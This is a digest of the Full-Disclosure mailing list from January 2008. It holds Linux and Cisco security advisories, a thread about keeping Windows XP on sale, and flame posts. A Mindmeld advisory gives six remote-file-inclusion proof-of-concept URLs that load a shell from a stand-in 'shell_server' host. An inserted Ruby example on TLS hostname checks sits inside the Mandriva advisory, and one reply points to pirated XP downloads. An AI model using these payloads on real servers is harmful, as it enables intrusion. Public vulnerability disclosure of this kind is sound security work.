Re: [Full-disclosure] Save XP

2008-01-31 Thread Linval Thompson
On Jan 28, 2008 10:45 PM, Paul Schmehl [EMAIL PROTECTED] wrote:

 Or, rather than trying to swim upstream, you could buy a Mac.  Or install
 *nix*
 on your Winblows computer..


That's not a good alternative.
Windows has only a single reason to exist, and that is running games, since
wine cannot run everything.
My winxp partition is labeled Playstation...
Unfortunately, since I like to play, I'm forced to use win for it.
And since winxp is the only decent windows, making microsoft continue
their only useful operating system is indeed a good purpose.
I hope I've explained my PoV of why that petition is not so bad after all...


--
LT
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Save XP

2008-01-31 Thread Dude VanWinkle
On Jan 28, 2008 3:43 PM, scott [EMAIL PROTECTED] wrote:
 For all those who believe Vista is still not up to par, you can help stop
 MS from forcing us to go to Vista.

 For those who don't know, MS is planning on stopping XP sales after June
 30, 2008. There are a few options for enterprise users, but Joe XP user
 will not be able to go to any store and buy a copy of XP after that
 date. Or at least after the stores sell out of what they have on hand.

 You can sign a petition at InfoWorld that may delay or stop MS from
 forcing us to use Vista.

 Sign the petition here:
 http://reg.itworld.com/servlet/Frs.frs?Context=LOGENTRYSource=savexpblog080114Source_BC=13Script=/LP/80276783/reg;
 Maybe we can stop this.

You have two choices: http://thepiratebay.org/search/xp/0/99/300 or
the Chinese market ;-)

-JP


[Full-disclosure] [ GLSA 200801-20 ] libxml2: Denial of Service

2008-01-31 Thread Pierre-Yves Rofes
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200801-20
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: libxml2: Denial of Service
      Date: January 30, 2008
      Bugs: #202628
        ID: 200801-20

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A Denial of Service vulnerability has been reported in libxml2.

Background
==

libxml2 is the XML (eXtended Markup Language) C parser and toolkit
initially developed for the Gnome project.

Affected packages
=

-------------------------------------------------------------------
     Package              /     Vulnerable     /       Unaffected
-------------------------------------------------------------------
  1  dev-libs/libxml2          < 2.6.30-r1            >= 2.6.30-r1

Description
===

Brad Fitzpatrick reported that the xmlCurrentChar() function does not
properly handle some UTF-8 multibyte encodings.

Impact
==

A remote attacker could entice a user to open a specially crafted XML
document with an application using libxml2, possibly resulting in a
high CPU consumption. Note that this vulnerability could also be
triggered without user interaction by an automated system processing
XML content.

Workaround
==

There is no known workaround at this time.

Resolution
==

All libxml2 users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =dev-libs/libxml2-2.6.30-r1

References
==

  [ 1 ] CVE-2007-6284
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6284

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200801-20.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


[Full-disclosure] [ MDVSA-2008:029 ] - Updated ruby packages fix possible man-in-the-middle attack

2008-01-31 Thread security

 ___
 
 Mandriva Linux Security Advisory MDVSA-2008:029
 http://www.mandriva.com/security/
 ___
 
 Package : ruby
 Date: January 31, 2008
 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
 ___
 
 Problem Description:
 
 Ruby network libraries Net::HTTP, Net::IMAP, Net::FTPTLS, Net::Telnet,
 Net::POP3, and Net::SMTP, up to Ruby version 1.8.6 are affected by a
 possible man-in-the-middle attack, when using SSL, due to a missing
 check of the CN (common name) attribute in SSL certificates against
 the server's hostname.
 
 The updated packages have been patched to prevent the issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5162
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5770
 ___
 
 Updated Packages:
 
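The check the advisory says was missing, as an added example that is not part of the advisory or of Ruby's own Net::* libraries: a constructed self-signed certificate is matched against the hostname the client intended to reach with OpenSSL::SSL.verify_certificate_identity, which is the identity check a client must run after the TLS handshake (post_connection_check performs it on a live socket). The hostnames, the helper names and the ca_file parameter are assumptions for illustration.

```ruby
require "openssl"
require "socket"

# Constructed test fixture (not a real server's certificate): a self-signed
# certificate with the given subject CN and subjectAltName DNS entries.
def make_self_signed_cert(cn, dns_sans)
  key  = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version    = 2
  cert.serial     = 1
  cert.subject    = OpenSSL::X509::Name.parse("/CN=#{cn}")
  cert.issuer     = cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after  = Time.now + 3600
  unless dns_sans.empty?
    ef = OpenSSL::X509::ExtensionFactory.new
    ef.subject_certificate = cert
    ef.issuer_certificate  = cert
    san = dns_sans.map { |d| "DNS:#{d}" }.join(",")
    cert.add_extension(ef.create_extension("subjectAltName", san, false))
  end
  cert.sign(key, OpenSSL::Digest.new("SHA256"))
  cert
end

# The missing step: does the certificate the peer presented actually name
# the host we meant to talk to? Chain validation alone only proves that a
# trusted CA signed *some* certificate; without this binding any valid
# certificate for any host is accepted, which is the man-in-the-middle
# condition the advisory describes. verify_certificate_identity matches
# subjectAltName dNSName entries (wildcards in the leftmost label included)
# and falls back to the subject CN only when no SAN is present.
def identity_matches?(cert, intended_host)
  OpenSSL::SSL.verify_certificate_identity(cert, intended_host)
end

# How a client applies the same check on a live connection (assumed helper,
# needs network access so it is not exercised here): VERIFY_PEER validates
# the chain, post_connection_check binds the result to the requested host
# and raises OpenSSL::SSL::SSLError on a mismatch.
def open_verified_tls(host, port, ca_file)
  ctx = OpenSSL::SSL::SSLContext.new
  ctx.verify_mode = OpenSSL::SSL::VERIFY_PEER
  ctx.ca_file = ca_file
  ssl = OpenSSL::SSL::SSLSocket.new(TCPSocket.new(host, port), ctx)
  ssl.hostname = host # SNI, so the server can pick the right certificate
  ssl.connect
  ssl.post_connection_check(host)
  ssl
end
```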

[Full-disclosure] rPSA-2008-0032-1 xorg-x11 xorg-x11-fonts xorg-x11-tools xorg-x11-xfs

2008-01-31 Thread rPath Update Announcements
rPath Security Advisory: 2008-0032-1
Published: 2008-01-30
Products:
rPath Linux 1
rPath Appliance Platform Linux Service 1

Rating: Severe
Exposure Level Classification:
Local Root Deterministic Privilege Escalation
Updated Versions:
[EMAIL PROTECTED]:1/6.8.2-30.13-1
[EMAIL PROTECTED]:1/6.8.2-30.13-1
[EMAIL PROTECTED]:1/6.8.2-30.13-1
[EMAIL PROTECTED]:1/6.8.2-30.13-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-1970
https://issues.rpath.com/browse/RPL-2010

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6427
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6428
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6429
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5760
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0006
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5958

Description:
Previous versions of the xorg-x11 package contain multiple
vulnerabilities, the most serious of which allow authenticated
users to execute arbitrary code with elevated privileges.

http://wiki.rpath.com/Advisories:rPSA-2008-0032

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html


[Full-disclosure] Cisco Security Advisory: Cisco Wireless Control System Tomcat mod_jk.so Vulnerability

2008-01-31 Thread Cisco Systems Product Security Incident Response Team

Cisco Security Advisory: Cisco Wireless Control System Tomcat mod_jk.so
Vulnerability

Advisory ID: cisco-sa-20080130-wcs

http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml

Revision 1.0

For Public Release 2008 January 30 1600 UTC (GMT)

+---

Summary
===

Apache Tomcat is the servlet container for JavaServlet and JavaServer
Pages Web within the Cisco Wireless Control System (WCS). A
vulnerability exists in the mod_jk.so URI handler within Apache Tomcat
which, if exploited, may result in a remote code execution attack.

This advisory is posted at 
http://www.cisco.com/warp/public/707/cisco-sa-20080130-wcs.shtml.

Affected Products
=

This section provides details on affected products.

Vulnerable Products
+--

Cisco WCS devices running software 3.x and 4.0.x prior to 4.0.100.0 are
affected by this vulnerability. Cisco WCS devices running software 4.1.x
and 4.2.x prior to version 4.2.62.0 are also vulnerable.

Note: The version of WCS software installed on a particular device can
be found via the WCS HTTP management interface. Select
Help > About the Software to obtain the software version.

Products Confirmed Not Vulnerable
+

No other Cisco products are currently known to be affected by this
vulnerability.

Details
===

The Cisco Wireless Control System is a centralized, systems-level
platform for managing and controlling lightweight access points,
wireless LAN controllers, and Wireless Location Appliances for the
Cisco Unified Wireless Network. The Cisco Wireless Control System uses
Apache Tomcat. A vulnerability in Apache Tomcat may allow for remote
code execution attacks. The mod_jk.so URI handler does not handle long
URLs correctly. An insecure memory copy triggers an exploitable stack
overflow. This vulnerability is documented in CVE-2007-0774 and in Cisco
bug ID CSCsk18191.

Vulnerability Scoring Details
+

Cisco has provided scores for the vulnerability in this advisory based
on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in
this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of the
vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS
at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html.

Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss.

CSCsk18191 - WCS mod_jk.so Apache Tomcat vulnerability 

CVSS Base Score - 10.0
Access Vector -Network 
Access Complexity -Low
Authentication -   None 
Confidentiality Impact -   Complete
Integrity Impact - Complete
Availability Impact -  Complete

CVSS Temporal Score - 8.3
Exploitability -   Functional
Remediation Level -Official-Fix 
Report Confidence -Confirmed


Impact
==

Successful exploitation of the vulnerability may result in remote code
execution.

Software Versions and Fixes
===

Each row of the following software table (below) describes a release
train and the platforms or products for which it is intended. If a
given release train is vulnerable, then the earliest possible releases
that contain the fix are shown in the First Fixed Release column. A
device running a release in the given train that is earlier than the
release in a specific column (less than the First Fixed Release) is
known to be vulnerable. The release should be upgraded at least to the
indicated release or a later version (greater than or equal to the
First Fixed Release label).

+-+
| Affected Releases   | First Fixed   |
| | Releases  |
|-+---|
| WCS for Linux and Windows 4.0.x and | 4.0.100.0 |
| earlier |   |
|-+---|
| WCS for Linux and Windows 4.1.91.0 and  | 4.2.62.0  |
| earlier |   |
+-+

When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the

Re: [Full-disclosure] [ GLSA 200801-17 ] Netkit FTP Server: Denial of Service

2008-01-31 Thread Jamie Haggett
Unsubscribe full-disclosure


On 29/01/08 4:09 PM, Raphael Marichez [EMAIL PROTECTED] wrote:

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200801-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Netkit FTP Server: Denial of Service
      Date: January 29, 2008
      Bugs: #199206
        ID: 200801-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Netkit FTP Server contains a Denial of Service vulnerability.

Background
==

net-ftp/netkit-ftpd is the Linux Netkit FTP server with optional SSL
support.

Affected packages
=

-------------------------------------------------------------------
     Package              /     Vulnerable     /       Unaffected
-------------------------------------------------------------------
  1  net-ftp/netkit-ftpd       < 0.17-r7              >= 0.17-r7

Description
===

Venustech AD-LAB discovered that an FTP client connected to a
vulnerable server with passive mode and SSL support can trigger an
fclose() function call on an uninitialized stream in ftpd.c.

Impact
==

A remote attacker can send specially crafted FTP data to a server with
passive mode and SSL support, causing the ftpd daemon to crash.

Workaround
==

Disable passive mode or SSL.

Resolution
==

All Netkit FTP Server users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =net-ftp/netkit-ftpd-0.17-r7

References
==

  [ 1 ] CVE-2007-6263
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6263

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200801-17.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5


Re: [Full-disclosure] Save XP

2008-01-31 Thread mgk.mailing
Were there similar cries for Windows 95 / 98 in years past?

/mgk



James Matthews wrote:
 Ok signed up! I hope it works!
  
 On Jan 28, 2008 9:43 PM, scott [EMAIL PROTECTED] 
 mailto:[EMAIL PROTECTED] wrote:
  For all those who believe Vista is still not up to par, you can help 
 stop
  MS from forcing us to go to Vista.
 
  For those who don't know, MS is planning on stopping XP sales after June
  30, 2008. There are a few options for enterprise users, but Joe XP user
  will not be able to go to any store and buy a copy of XP after that
  date. Or at least after the stores sell out of what they have on hand.
 
  You can sign a petition at InfoWorld that may delay or stop MS from
  forcing us to use Vista.
 
  Sign the petition here:
  
 http://reg.itworld.com/servlet/Frs.frs?Context=LOGENTRYSource=savexpblog080114Source_BC=13Script=/LP/80276783/reg;
  
 http://reg.itworld.com/servlet/Frs.frs?Context=LOGENTRYSource=savexpblog080114Source_BC=13Script=/LP/80276783/reg;
  

  Maybe we can stop this.
 
  Regards,
Scott
 
 
 
 -- 
 http://search.goldwatches.com/?Search=Movado+Watches
 http://www.jewelerslounge.com
 http://www.goldwatches.com
 



[Full-disclosure] dude vanwinkle turns against fergdawg, trendmicro

2008-01-31 Thread worried security
http://linuxbox.org/pipermail/funsec/2008-January/016043.html

explosive scenes have been witnessed by n3td3v group as VanWinkle
spreads attack on Fergdawg and Trendmicro

Fergdawg lusts up the chance to plug he works for the company hand
jerk sound effects


We don't know if the FIGHT/CONFLICT/WAR will continue in the thread,
but signals of unrest between FUNSEC regulars is only just kicking
off.


get your ring side seats, only VanWinkle will survive.


Re: [Full-disclosure] Save XP

2008-01-31 Thread scott
Yes and MS quietly extended 98 for a few more years until they came out 
with 2000. A much better OS than ME at the time, IMHO.


Scott

mgk.mailing wrote:

Were there similar cries for Windows 95 / 98 in years past?

/mgk



James Matthews wrote:

Ok signed up! I hope it works!
 
On Jan 28, 2008 9:43 PM, scott [EMAIL PROTECTED] 
mailto:[EMAIL PROTECTED] wrote:
 For all those who believe Vista is still not up to par, you can help 
stop

 MS from forcing us to go to Vista.

 For those who don't know, MS is planning on stopping XP sales after 
June

 30, 2008. There are a few options for enterprise users, but Joe XP user
 will not be able to go to any store and buy a copy of XP after that
 date. Or at least after the stores sell out of what they have on hand.

 You can sign a petition at InfoWorld that may delay or stop MS from
 forcing us to use Vista.

 Sign the petition here:
 
http://reg.itworld.com/servlet/Frs.frs?Context=LOGENTRYSource=savexpblog080114Source_BC=13Script=/LP/80276783/reg; 
http://reg.itworld.com/servlet/Frs.frs?Context=LOGENTRYSource=savexpblog080114Source_BC=13Script=/LP/80276783/reg; 


 Maybe we can stop this.

 Regards,
   Scott



--
http://search.goldwatches.com/?Search=Movado+Watches
http://www.jewelerslounge.com
http://www.goldwatches.com



[Full-disclosure] [ GLSA 200801-21 ] Xdg-Utils: Arbitrary command execution

2008-01-31 Thread Pierre-Yves Rofes
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200801-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Xdg-Utils: Arbitrary command execution
      Date: January 30, 2008
      Bugs: #207331
        ID: 200801-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A vulnerability has been discovered in Xdg-Utils, allowing for the
remote execution of arbitrary commands.

Background
==

Xdg-Utils is a set of tools allowing all applications to easily
integrate with the Free Desktop configuration.

Affected packages
=

-------------------------------------------------------------------
     Package              /     Vulnerable     /       Unaffected
-------------------------------------------------------------------
  1  x11-misc/xdg-utils        < 1.0.2-r1             >= 1.0.2-r1

Description
===

Miroslav Lichvar discovered that the xdg-open and xdg-email shell
scripts do not properly sanitize their input before processing it.

Impact
==

A remote attacker could entice a user to open a specially crafted link
with a vulnerable application using Xdg-Utils (e.g. an email client),
resulting in the execution of arbitrary code with the privileges of the
user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Xdg-Utils users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =x11-misc/xdg-utils-1.0.2-r1

References
==

  [ 1 ] CVE-2008-0386
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0386

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200801-21.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

[Full-disclosure] [ GLSA 200801-22 ] PeerCast: Buffer overflow

2008-01-31 Thread Pierre-Yves Rofes
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                        GLSA 200801-22:02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: PeerCast: Buffer overflow
      Date: January 30, 2008
   Updated: January 30, 2008
      Bugs: #202747
        ID: 200801-22:02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A buffer overflow vulnerability has been discovered in PeerCast.

Background
==

PeerCast is a client and server for the P2P-radio network.

Affected packages
=

-------------------------------------------------------------------
     Package              /     Vulnerable     /       Unaffected
-------------------------------------------------------------------
  1  media-sound/peercast      < 0.1218               >= 0.1218

Description
===

Luigi Auriemma reported a heap-based buffer overflow within the
handshakeHTTP() function when processing HTTP requests.

Impact
==

A remote attacker could send a specially crafted request to the
vulnerable server, possibly resulting in the remote execution of
arbitrary code with the privileges of the user running the PeerCast
server, usually nobody.

Workaround
==

There is no known workaround at this time.

Resolution
==

All PeerCast users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =media-sound/peercast-0.1218

References
==

  [ 1 ] CVE-2007-6454
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6454

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200801-22.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2008 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

Re: [Full-disclosure] dude vanwinkle turns against fergdawg, trendmicro

2008-01-31 Thread poo
shut up

On Jan 30, 2008 8:15 PM, worried security [EMAIL PROTECTED]
wrote:

 http://linuxbox.org/pipermail/funsec/2008-January/016043.html

 explosive scenes have been witnessed by n3td3v group as VanWinkle
 spreads attack on Fergdawg and Trendmicro

 Fergdawg lusts up the chance to plug he works for the company hand
 jerk sound effects


 We don't know if the FIGHT/CONFLICT/WAR will continue in the thread,
 but signals of unrest between FUNSEC regulars is only just kicking
 off.


 get your ring side seats, only VanWinkle will survive.





-- 
smile tomorrow will be worse

[Full-disclosure] Multiple Remote File Inclusion Vulnerabilities in Mindmeld version 1.2.0.10

2008-01-31 Thread David Wharton
Summary

Mindmeld is an enterprise-capable knowledge-sharing system written
in PHP. There are multiple remote file inclusion vulnerabilities in
Mindmeld version 1.2.0.10 (latest version).

Details

1. Vulnerable File and Line:

Mindmeld-1.2.0.10/acweb/admin_index.php: line 51
require_once ( $MM_GLOBALS['home']."include/utilities.inc" );

PoC:

http://server/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=http://shell_server/shell.php?

---
2. Vulnerable file and line:

Mindmeld-1.2.0.10/include/ask.inc.php: line 34
require_once ( $MM_GLOBALS['home'] . interfaces  
{$MM_GLOBALS['interface']}/include/ .  
interface_{$MM_GLOBALS['interface']}_ask.inc );

PoC:

http://server/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?php?

---
3. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/learn.inc.php: line 38
require_once ( $MM_GLOBALS['home'] . interfaces/ 
{$MM_GLOBALS['interface']}/include/

PoC:

http://server/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?

---
4. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/manage.inc.php: line 31
require_once ( $MM_GLOBALS['home'] . interfaces/ 
{$MM_GLOBALS['interface']}/include/

PoC:

http://server/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?

---
5. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/mind.inc.php: line 33
require_once( $MM_GLOBALS['home'] . 'include/utilities.inc' );

PoC:

http://server/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?

---
6. Vulnerable File and Line:

Mindmeld-1.2.0.10/include/sensory.inc.php: line 70
require_once ( $MM_GLOBALS['home'] . "include/utilities.inc" );

PoC:

http://server/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=http://shell_server/shell.php?

---
It appears that these vulnerabilities are not vulnerable to local file  
includes.

These vulnerabilities have been disclosed to the vendor although  
development on this software has stopped.

Sources:

http://mindmeld.sourceforge.net/

Quick Fix:

In php.ini, disable the following variables: register_globals,  
allow_url_fopen, and allow_url_include.

Credit:

David Wharton



Re: [Full-disclosure] Save XP

2008-01-31 Thread Tyler Reguly
Sometimes I'm reminded of why Full Disclosure amuses me and why I stay
subscribed.

On 1/30/08, scott [EMAIL PROTECTED] wrote:

 Yes and MS quietly extended 98 for a few more years until they came out
 with 2000. A much better OS than ME at the time, IMHO.



Windows ME Release Date: Sept. 14, 2000
Windows 2000 Release Date: Feb. 17, 2000

Windows 2000 was out half a year ahead of Windows ME... so something tells
me they didn't quietly extend 98 for a few more years until they came out
with 2000... even if you were talking XP (which was Oct 2001) it would be a
year, not a few years.


Bill: You aren't being fair with our EOL dates. You are comparing XP Pro
(Officially a business operating system) to Vista Home Premium (a Home
operating System)... you have to compare XP Pro to a Business version of
Vista and when you do that you get Vista Business with an EOL of 2017 (
http://support.microsoft.com/lifecycle/?p1=11707 ), 3 years after XP Pro.


Tyler.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Livelink UTF-7 XSS Vulnerability

2008-01-31 Thread David Kierznowski
Release date: 31/Jan/2008
Last Modified: N/A
Author: David Kierznowski http://withdk.com
Application: Livelink = 9.7.0
Risk: Medium

Full details of advisory available here:
http://www.withdk.com/2008/01/31/livelink-utf-7-xss-vulnerability/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] undersea cable cut and internet problem!

2008-01-31 Thread crazy frog crazy frog
http://www.cnn.com/2008/WORLD/meast/01/31/dubai.outage/index.html

-- 
advertise on secgeeks?
http://secgeeks.com/Advertising_on_Secgeeks.com
http://newskicks.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Save XP

2008-01-31 Thread Peter Besenbruch
On Wednesday 30 January 2008 08:32:36 scott wrote:
 Yes and MS quietly extended 98 for a few more years until they came out
 with 2000.A much better OS than ME at the time,IMHO.

While Windows 98 SE was the best of the 9x series, I don't think anyone really 
mourned its passing (I still use it under Qemu). XP would have been hands 
down a better system except for its obnoxious copy protection. Even so, the 
stability advantages XP yielded made it a better system.

Windows 2000 and ME were released the same year (2000 first, if I remember). 
2000 was seen as an update to NT4, not 98. 2000 was the first NT OS to 
include plug and play, but the conversion from 98 to 2000 required a full 
reinstall. XP let you upgrade your Windows 9x system directly, although that 
was probably not a good idea.

If there is a best Windows candidate, I would vote for Windows 2000. It was 
relatively light weight, stable, and it offered minimal copy protection.
-- 
Hawaiian Astronomical Society: http://www.hawastsoc.org
HAS Deepsky Atlas: http://www.hawastsoc.org/deepsky

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Save XP

2008-01-31 Thread Bill Stout
Tyler, 

You're correct.

2009 Windows Se7en RTM http://en.wikipedia.org/wiki/Windows_7 

2012 Vista Basic EOL http://support.microsoft.com/lifecycle/?p1=11731
2014 XP Home xEOL http://support.microsoft.com/lifecycle/?p1=3221
2014 XP Pro xEOL http://support.microsoft.com/lifecycle/?p1=3223
2017 Vista Bus xEOL http://support.microsoft.com/lifecycle/?p1=11707
2017 Vista Ent xEOL http://support.microsoft.com/lifecycle/?p1=11737

Still, there's a big difference in lifecycle.  XP was introduced in 2001, and 
planned EOL is 2009 (eight year lifecycle).  Vista was introduced in 2007, and 
planned EOL is 2012 (five year lifecycle).  That's pretty short product 
lifecycle for a $10B* development effort.

*Ref: 
http://seattletimes.nwsource.com/html/businesstechnology/2003460386_btview04.html

Bill Stout

- Original Message 
From: Tyler Reguly [EMAIL PROTECTED]
To: scott [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Thursday, January 31, 2008 2:52:23 AM
Subject: Re: [Full-disclosure] Save XP

Sometimes I'm reminded of why Full Disclosure amuses me and why I stay 
subscribed


On 1/30/08, scott [EMAIL PROTECTED] wrote:
Yes and MS quietly extended 98 for a few more years until they came out
with 2000.A much better OS than ME at the time,IMHO.


Windows ME Release Date: Sept. 14, 2000
Windows 2000 Release Date: Feb. 17, 2000

Windows 2000 was out half a year ahead of Windows ME... so something tells me 
they didn't quietly extend 98 for a few more years until they came out with 
2000... even if you were talking XP (which was Oct 2001) it would be a year, 
not a few years. 



Bill: You aren't being fair with our EOL dates. You are comparing XP Pro 
(Officially a business operating system) to Vista Home Premium (a Home 
operating System)... you have to compare XP Pro to a Business version of Vista 
and when you do that you get Vista Business with an EOL of 2017 ( 
http://support.microsoft.com/lifecycle/?p1=11707 ), 3 years after XP Pro. 


Tyler.



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] back to high value targets

2008-01-31 Thread Dude VanWinkle
On Jan 31, 2008 3:51 PM, gmaggro [EMAIL PROTECTED] wrote:
  One planned for Egypt-France is 8 pair, each pair doing 128 lambdas
  at 10Gbit per lambda.  Do the math.

 That's a lot of retards

And they don't have to upgrade the fiber in order to upgrade the
bandwidth. They use the same fiber and just swap out the lasers on
either side

-JP

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] back to high value targets

2008-01-31 Thread Valdis . Kletnieks
On Thu, 31 Jan 2008 16:39:57 EST, Dude VanWinkle said:
 On Jan 31, 2008 3:51 PM, gmaggro [EMAIL PROTECTED] wrote:
   One planned for Egypt-France is 8 pair, each pair doing 128 lambdas
   at 10Gbit per lambda.  Do the math.
 
  That's a lot of retards
 
 And they don't have to upgrade the fiber in order to upgrade the
 bandwidth. They use the same fiber and just swap out the lasers on
 either side

Within limits - the replacement laser has to be something that works with
the regen units located every 30 to 50 miles or so along the cable 
(incidentally,
getting power to a regen unit that's 1,500 miles down the cable and under 4
miles of water is non-trivial - the usual solution for that is to pump a
high-voltage feed down a copper conductor in the cable.  Only one conductor
is needed, because salt water makes a *very* good ground. ;)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] back to high value targets

2008-01-31 Thread gmaggro
Maybe I'm going about this wrong?

I suspect if you figured out a way to downgrade a handful of 
bond/investment companies we might be eating squirrel meat in the local 
park come spring ;)

___
